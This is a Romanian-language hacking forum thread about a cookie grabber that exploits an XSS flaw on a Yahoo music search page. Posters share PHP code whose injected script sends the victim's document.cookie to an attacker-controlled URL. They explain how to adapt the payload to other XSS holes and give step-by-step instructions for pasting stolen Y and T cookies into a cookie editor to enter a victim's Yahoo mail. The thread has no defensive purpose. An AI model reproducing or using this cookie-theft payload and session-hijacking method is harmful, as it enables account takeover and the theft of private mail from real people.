Jump to content
loki

Yah00 Cookie grabber bazat pe redirect 404

Recommended Posts

Posted
xss-ul inca merge fff bine!!

wtf azi noapte era cazut, lucreaza la site, ce naiba, ma trimitea la alta adresa din cn.yahoo sa caut muzica acolo.... :shock: sper ca nu lucreaza la patch-uirea lui

Posted

Am si eu o intrebare nu prea am inteles ce cu xss dar le folosesc :roll:

Si vreau sa te intreb ceva lokipaki dupa ce v-a fi patchuit xss-ul si gasesc alt xss unde il inlocuiesc ?

Zimi daca e bine ... uite aici ?


$got=$_GET['got'];
if(!$got) { header('Location: '.$xss.'</title><script>document.location="http://'.$geturl.'?got=1%26get="%2Bescape(document.cookie);</script>'); exit();}

Daca nu explica-mi tu sa inteleg odata

Sau cand gasesc Xss la un site ce pot face cu el explicami in mare cam ce as face adik pot face tot un grabbed ? sau cum ?

Ms...

Posted

Nu acolo, aici:

// DE MODIFICAT DUPA CAZ:
$xss='http://music.cn.yahoo.com/search?p=';

In ideea ca urmeaza script dupa p=.

Am vrut sa separ pentru usurare dar pentru alte xss-uri e bine de umblat si mai jos:

</title><script>document.location= poate fi inlocuit deobicei cu "><script>document.location= (</title> are rol doar in acest caz de a optimiza viteza ca sa se execute imediat dupa zona titlu).

In concluzie pentru a generaliza codul pentru mai multe xss-uri se pot face modificarile codului asfel:

$xss='http://music.cn.yahoo.com/search?p=</title>';

...

if(!$got) { header('Location: '.$xss.'"><script>document.location="...

Dar ruperea asta a link-ului a fost facuta doar in scopul unei mai usoare intelegeri a codului.

Un xss la alt site il poti folosi similar dar pe situl ala. Trebuie sa stii la ce ai nevoie de cookie-ul de acolo dar in rest nu merge aceeasi metoda, numai la yahoo exista un link de intrare in mail. La altele poti fura cookie si lucra pe cookie-ul tau de pe disc pentru a obtine o sesiune. La neogen de exemplu e un cid= in cookie care odata inlocuit iti garanteaza accesul in cont.

Posted

MEtoda asta de a fura cookie merge si dak instalezi un wamp server si pui p el folderul /prajituri ? Bineinteles dak ai asociat domeniu etc ....

:roll:

Posted

probabil

metoda asta e initial facuta cu scopul de a o trage tuturor serverelor care iti da cu flit la un <img src="...php" inclusiv hi5. E doar o punere in practica.

Posted

Instalati la Firefox COOKIE EDITOR si intrati pe mail.yahoo.com apoi va logati pe mailul vostru.Intrati in Cookie Editor si modificati Y si T ale voastre cu cele luat cu stealerul si apoi dati save urmat de refresh la pagina si veti fii pe mailul victimei.Bafta!

Edit: Pt AllexCT

Posted
Instalati la Firefox COOKIE EDITOR si intrati pe mail.yahoo.com apoi va logati pe mailul vostru.Intrati in Cookie Editor si modificati Y si T ale voastre cu cele luat cu stealerul si apoi dati save urmat de refresh la pagina si veti fii pe mailul victimei.Bafta!

Edit: Pt AllexCT

da man dar asta e metoda standard pentru orice cookie in afara de yahoo unde... nu mai modifici nimic; e unul din putinele servicii care iti ofera covorash roshu ca sa intri direct, adica link direct continand Y si T.

Posted

@lokipaki

singura problema cu xss e ca nu merge pe IE

pe firefox merge orice varianta si pe opera daca ai gasi unul care merge si pe IE sau sti vre unul ar fi perfect ...

As putea sa fac o identificare de browser iar dupa aceea sa folosesc xss in functie de browser :) ...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...